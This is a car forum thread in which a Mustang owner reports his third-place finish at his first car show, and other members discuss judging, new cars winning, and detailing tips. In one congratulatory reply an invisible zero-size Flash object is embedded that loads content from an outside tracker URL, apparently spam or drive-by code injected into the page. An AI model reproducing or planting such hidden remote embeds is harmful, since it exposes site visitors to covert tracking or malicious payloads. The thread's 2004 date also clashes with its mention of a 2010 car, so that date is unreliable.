Car Show Results

COBESGT

Oct 19, 2004
Dubuque, Iowa
Not sure if anyone will care, but I entered the Mustang into my first Car Show today. I entered into the 1988 - Present (Stock) category and really wasn't expecting to win anything since there were so many nice cars there. Well low and behold I took 3rd Place! :D 1st Place went to a 2010 Camaro and 2nd Place to a White 2007 Shelby GT. I have to admit I was pleasantly pleased, as this was the first time I ever registered a car in a car show. When the judges got done judging my car I asked them what I could of done better and they only had two items, the tires should be shiny and the engine compartment could of been a littler cleaner (dust on one of the wire looms).

• Sponsors (?)

Congrats! Your car looks great from your sig pic. The 2010 Camaro probably just won on the novelty of it being new, so theoretically you took 2nd!

By the way, what does "stock" mean for that car show if your car qualifies?

I have judged shows and would never award a first place to a brand new car. It is more difficult to keep an older car looking like new. Let's see what that Camaro looks like in 11 years.
A new car just means you have the money to buy something new.

Congrats! Your car looks great from your sig pic. The 2010 Camaro probably just won on the novelty of it being new, so theoretically you took 2nd!

By the way, what does "stock" mean for that car show if your car qualifies?

I was a little baffled at this myself, but when I pulled into the show a judge at the entrance gave me a piece of paper and "He" decided what category I was in. I suppose I could of chosen 1988 - Present (Modified) but didn't really know what to think being my first show.

As far as the Camaro winning, I felt like that was a bunch of crap too! Like he's even driven that thing! Then the 2007 Shelby GT, still had the plastic on the floor carpet and plastic over the drivers seat. Oh well, I'm not going to complain one bit, I still was able to take home a trophy!

Congrats of the 3rd place finish, cobesgt !! :nice:
Having someone else complement your car and your hard work in any contest has to be gratifying. WTG<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Congrats man...your car looks great.

Good for you! Your sig pic looks awesome! I just entered my first show as well a few weeks back. I took 2nd (there were only 4 Mustang in the class). :shrug: It was still fun to be there, every one was pretty cool comparing wrench time stories. Like you I was given a dash plaque (a piece of paper) with my car info, name and class category. I was put into the 2000 – 2010 domestic class when I first got there. I parked next to a Neon. As I was dusting it off a staff guy came over and told me about the open Mustang class and I parked over there. I told him this was where the entry guy told me to go, oh well, no big deal.

WTG:nice:
I agree that new cars shouldn't win! Drooled over, yes...trophy...no!

I'm not all into the "show car" status as too many of them never see the road or much of it! Granted they look good, but I want to DRIVE my car! Even though I had lots of body parts replaced and custom paint job done, I still put several thousand miles a month on mine (13K since getting it out of the body shop in early March):rock:

Done a lot of shows with my car and not one time have I heard anyone get dinged for not having shiney tires. First of all I can't stand the jerry curl look, I apply a light dressing that makes the tire deep black with no sheen.

Dust on wireloom when your paired against a car that doesn't see daylight (that Shelby with the plastic coverings) seems crude..

Sounds like they were going by a point system, did you receive a card for how they scored the car?

I never asked for the judging card, but I could see that it was going by a points system. I was trying to sneak a peek at it as they were walking around the car. I saw mostly 10's/9's and possibly two 7's. I agree with you on the tires thing, I had an armor-all sponge in the car and decided not to use it since I had just wiped the tires down with some Westleys Tire Bleach. Oh well, I'm not upset at all, I'm very happy taking 3rd Place the first time I ever tried. Plus now that I know what to do, I think I should fair better in future shows. The biggest problem now is trying to get the trophy out of my youngest daughter's room. "She" has taken it over as it is hers now. It's actually kinda funny because I took all 3 of my kids to the show and the daughters were very excited when they announced my name. Of course they had to go with me to accept the trophy. Then it turned into a fight of "who" got to hold it. LOL

Totally off base here, but I've already informed my son (who is the oldest, 12) that he shouldn't even think of sneaking the Mustang out if Mom and Dad aren't home. I informed him that all I have to do is hook-up the tuner, change the rev limiter, top speed, etc, then take the tuner with me. He looked at me like, ahh big jerk! Score = Parents 1, kids ZERO!!!!:D Of course, I know what's it's like to sneak out the cars when the parents aren't home, been there, done that....

:nice: A little off topic, but still funny. Better to set the rules now before it happens than decide punishment later after it does... So back on topice now. Does anybody have any tips about shows? I was thinking of entering one here, but I don't get much time to detail after work...

one thing that i do pretty often, is i take my wheels off, scrub down the wheel wells, and clean the inside of the wheels, especially on open wheels like the stock bullitts, or something like fr500s, where you see the inside of the wheel.

i figured if you do this every so often, it shouldn't be so hard to clean, less work needs to be done, and it looks better.

after i get a few things settled on my car, i'll be getting it all detailed up and ready to enter some shows.

i can't stand stock cars in shows, shows are for showing off what you have done to your car to make it unique. buying a car from the dealership and driving straight to a show doesn't count as unique to me hah.

there are exceptions, such as clean 60s cars, don't need alot of changes, just need to be nice and clean. but newer cars, anyone can buy one, what makes it any different then the 30 other new cars you see on the road on the way to the show from entering?